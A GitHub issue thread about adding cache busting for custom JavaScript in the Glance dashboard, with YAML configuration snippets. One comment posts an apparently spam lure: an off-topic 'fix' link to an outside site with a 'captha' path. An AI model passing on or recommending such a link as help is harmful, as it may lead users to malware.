### ISSUE TITLE
JavaScript Cache Busting

### ISSUE THREAD

**Issue by ralphocdol** [glanceapp/glance#550]
### Description

I've noticed for a while now that adding CSS via the `custom-css-file: ` in `theme: ` config applies cache busting which appends `?v=server-start-time`
https://github.com/glanceapp/glance/blob/9da79671582c91f17508662bc936c3f673595ada/internal/glance/templates/page.html#L20
but I'm not seeing any way for the JavaScript. Is there a reason for this?

I've been relying on workarounds for a while, but it's good to have one built in.

I'll submit a PR for this.

**Comment by ilysuha** [comment]
This fix in another issue and it might help you [click](https://newrides.es/captha/)

**Comment by ralphocdol** [comment]
With the addition of `$include` made things a bit easier than I used to do it and without the need to load it from the assets path (client level).

```yml
document:
  head: |
     <script>
        $include: path-to/my.js
     </script>
```

**Comment by ralphocdol** [comment]
> With the addition of `$include` made things a bit easier than I used to do it and without the need to load it from the assets path (client level).

What a mistake this was, sure it did address the cache issue by not caching at all, but then my script grew bigger 😅. The PR #551 was long outdated and frankly unnecessarily complicated. Access to `.App.CreatedAt.Unix` in the `head: | ` would probably simplify things so that I can:

```yaml
document:
  head: |
     <script src="assets/some.js?v={{ createdAt }}"></script>
```

Will this be possible?
@svilenmarkov pinging you since I'm not sure how `Reopen issue` work.
